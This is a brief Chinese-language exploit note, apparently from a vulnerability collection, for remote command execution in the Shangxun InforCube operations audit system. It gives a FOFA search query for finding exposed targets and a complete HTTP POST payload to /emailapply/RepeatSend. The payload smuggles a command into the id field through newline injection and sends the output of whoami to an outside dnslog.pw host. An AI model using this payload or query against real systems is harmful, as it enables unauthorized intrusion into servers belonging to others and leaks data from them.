S36-1上讯-信息InforCube运维审计系统-RCE
网站图片:
fofa语法
body=“default/getloginhtml”
漏洞复现:
payload:
POST /emailapply/RepeatSend HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Connection: close
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.850.86 Safari/537.36
id='%0aping `whoami`.2uqhrrgd.dnslog.pw%0a'
效果图: